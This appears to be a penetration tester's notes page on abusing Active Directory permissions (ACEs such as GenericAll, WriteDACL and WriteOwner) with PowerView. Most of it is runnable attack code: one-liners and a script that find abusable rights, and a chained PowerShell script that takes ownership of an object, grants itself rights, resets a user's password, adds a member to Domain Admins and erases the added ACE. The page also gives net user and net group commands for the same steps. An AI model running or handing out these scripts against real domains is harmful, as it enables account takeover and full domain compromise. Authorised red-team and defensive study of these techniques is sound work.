ACLs/ACEs
Active Directory objects such as users and groups are securable objects: each carries a DACL whose ACEs define which principal may read or modify the object (e.g. change the account name, reset the password, edit group membership).
Some of the Active Directory object permissions and extended rights that we as attackers are interested in:
GenericAll - full rights to the object (e.g. reset a user's password or add members to a group)
GenericWrite - write any non-protected attribute of the object (e.g. a user's logon script, a group's member attribute)
WriteOwner - change the object's owner to an attacker-controlled principal; the owner can then rewrite the DACL and take over the object
WriteDACL - modify the object's ACEs, e.g. grant the attacker GenericAll over it
AllExtendedRights - all extended rights on the object, which for a user includes User-Force-Change-Password (reset the password without knowing the current one)
ForceChangePassword - the User-Force-Change-Password extended right on its own: reset the user's password
Self (Self-Membership) - validated write on a group's member attribute: add yourself (and only yourself) to the group
Enumerate with powerview
# ACEs on one user whose rights include GenericAll (-match also catches combined flags such as "GenericAll, WriteDacl", which -eq misses)
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll"}
# ACEs on every user / every group that are granted directly to the current user (the SID is resolved to DOMAIN\name first; rights inherited through group membership are not matched by this filter)
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")){$_}}
Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")){$_}}
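The one-liners above only match ACEs granted to the current user directly. The following is an added example (not part of the original notes) that also catches rights granted to any group in the current token, nested membership included, and labels each hit with the abuse primitive from the list above. It assumes PowerView (dev branch) is loaded in the session and is run from a domain-joined host as the user being checked; the property names (ObjectDN, ActiveDirectoryRights, ObjectAceType, SecurityIdentifier, AceType) are those returned by PowerView's Get-DomainObjectAcl:

```powershell
# Added example, not PowerView's own code. Requires PowerView (dev) loaded in the session.
# SIDs of the current user plus every group in the token (nested membership included),
# so a right granted to a group we sit in indirectly is not missed.
$me   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$sids = @($me.User.Value) + ($me.Groups | ForEach-Object { $_.Value })

# Rights from the list above that give some form of control over the target.
$interesting = 'GenericAll|GenericWrite|WriteOwner|WriteDacl|WriteProperty|Self|ExtendedRight'

# Same scope as the page's one-liners: every user and every group in the domain.
$targets = @(Get-DomainUser) + @(Get-DomainGroup)

$hits = $targets | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {
    $sids -contains $_.SecurityIdentifier.Value -and
    $_.AceType -match 'AccessAllowed' -and          # skip deny ACEs
    $_.ActiveDirectoryRights -match $interesting
} | ForEach-Object {
    # Classify the ACE so the abuse primitive is obvious at a glance.
    $abuse = switch -Regex ($_.ActiveDirectoryRights.ToString()) {
        'GenericAll'   { 'full control: reset password / add member'; break }
        'WriteDacl'    { 'grant yourself GenericAll with Add-DomainObjectAcl'; break }
        'WriteOwner'   { 'take ownership (Set-DomainObjectOwner), then WriteDacl'; break }
        'GenericWrite' { 'write attributes (member, scriptPath, ...)'; break }
        default {
            # Object-specific ACEs: with -ResolveGUIDs the GUID is shown as the attribute/right name.
            switch ($_.ObjectAceType) {
                'User-Force-Change-Password' { 'reset password (ForceChangePassword)' }
                'Self-Membership'            { 'add yourself to the group' }
                'Member'                     { 'write member attribute: add anyone to the group' }
                default                      { "check ObjectAceType: $($_.ObjectAceType)" }
            }
        }
    }
    [PSCustomObject]@{
        Target    = $_.ObjectDN
        Principal = ConvertFrom-SID $_.SecurityIdentifier.Value
        Rights    = $_.ActiveDirectoryRights
        AceType   = $_.ObjectAceType
        Abuse     = $abuse
    }
}

$hits | Sort-Object Target | Format-Table -AutoSize
```

Deny ACEs are filtered out because a matching AccessDenied entry cancels the allow; a hit on a group you are in only indirectly is still usable as soon as you log on as a member of that group.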
The output of these commands (shown as a screenshot in the original notes) is read column by column:
ObjectDN - the target object (here a user).
SecurityIdentifier - the principal that holds the right on that object (resolved to DOMAIN\name with ConvertFrom-SID in the commands above).
ActiveDirectoryRights - the right itself; GenericAll means full control over the object and is the most useful case.
GenericAll
Exploit with reset password
(GenericAll, ForceChangePassword, AllExtendedRights)
# user (force change password): resets the password without knowing the current one;
# run from a domain-joined host as the principal that holds the right
net user <username> <password> /domain
Add user to Group
(GenericAll, GenericWrite, or WriteProperty on the member attribute; Self-Membership only lets you add yourself)
# group --> domain admins (add a member to Domain Admins)
net group "domain admins" <username> /add /domain
WriteDACL
# grant the current user GenericAll over the target user (then reset its password or edit it as above)
Add-DomainObjectAcl -TargetIdentity <target username> -PrincipalIdentity <current user> -Rights All
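The steps above, chained end to end, as an added example that is not part of the original notes: it checks which ACE the current user holds on the target before each step, escalates WriteOwner to WriteDacl to a password reset, handles the group case, and removes the ACE it added. It assumes PowerView (dev branch) is loaded; the names svc_backup (target user) and the chosen password are hypothetical, and the attacker is whichever domain user runs the script:

```powershell
# Added example, not PowerView's own code. Requires PowerView (dev) loaded in the session.
$attacker    = "$env:USERDOMAIN\$env:USERNAME"   # the principal we run as
$attackerSid = ([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value
$targetUser  = 'svc_backup'                       # hypothetical target user
$targetGroup = 'Domain Admins'

# Return the allow ACEs on $Identity that are granted to our own SID.
function Get-MyAces {
    param([string]$Identity)
    Get-DomainObjectAcl -Identity $Identity -ResolveGUIDs |
        Where-Object { $_.SecurityIdentifier.Value -eq $attackerSid -and $_.AceType -match 'AccessAllowed' }
}

$aces   = Get-MyAces $targetUser
$rights = ($aces | ForEach-Object { $_.ActiveDirectoryRights.ToString() }) -join ','

# Step 1: WriteOwner only -> take ownership. The owner implicitly holds WriteDacl, so fall through to step 2.
if ($rights -match 'WriteOwner' -and $rights -notmatch 'WriteDacl|GenericAll') {
    Set-DomainObjectOwner -Identity $targetUser -OwnerIdentity $attacker
    $rights += ',WriteDacl'
}

# Step 2: WriteDacl -> add an ACE for ourselves. ResetPassword is the minimum needed here;
# the page's one-liner uses -Rights All, which is the same call with full control.
$addedAce = $false
if ($rights -match 'WriteDacl' -and $rights -notmatch 'GenericAll') {
    Add-DomainObjectAcl -TargetIdentity $targetUser -PrincipalIdentity $attacker -Rights ResetPassword
    $addedAce = $true
}

# Step 3: GenericAll / AllExtendedRights / ForceChangePassword -> reset the password.
# ForceChangePassword appears as ExtendedRight with ObjectAceType User-Force-Change-Password;
# AllExtendedRights appears as ExtendedRight with ObjectAceType All.
$canReset = $addedAce -or ($rights -match 'GenericAll') -or
            ($aces | Where-Object { $_.ActiveDirectoryRights -match 'ExtendedRight' -and
                                    $_.ObjectAceType -in 'User-Force-Change-Password','All' })
if ($canReset) {
    $newPass = ConvertTo-SecureString 'Hypothetical-P@ssw0rd-2024!' -AsPlainText -Force
    # Equivalent of: net user svc_backup <password> /domain
    Set-DomainUserPassword -Identity $targetUser -AccountPassword $newPass
}

# Step 4 (group): GenericAll / GenericWrite / WriteProperty on member -> add anyone;
# Self-Membership -> add only ourselves.
$groupAces    = Get-MyAces $targetGroup
$canAddAnyone = $groupAces | Where-Object {
    $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite' -or
    ($_.ActiveDirectoryRights -match 'WriteProperty' -and $_.ObjectAceType -in 'Member','All')
}
$canAddSelf = $groupAces | Where-Object {
    $_.ActiveDirectoryRights -match 'Self' -and $_.ObjectAceType -in 'Self-Membership','All'
}
if ($canAddAnyone) {
    Add-DomainGroupMember -Identity $targetGroup -Members $targetUser   # equivalent of net group ... /add /domain
} elseif ($canAddSelf) {
    Add-DomainGroupMember -Identity $targetGroup -Members $env:USERNAME # validated write: ourselves only
}

# Cleanup: remove the ACE we added so the DACL is left as we found it.
if ($addedAce) {
    Remove-DomainObjectAcl -TargetIdentity $targetUser -PrincipalIdentity $attacker -Rights ResetPassword
}
```

A password reset is the noisiest of these primitives: the legitimate user is locked out of the account and the DC logs event ID 4724, so on an engagement prefer the group or attribute write where the ACE allows it and always note any ACE you add for cleanup.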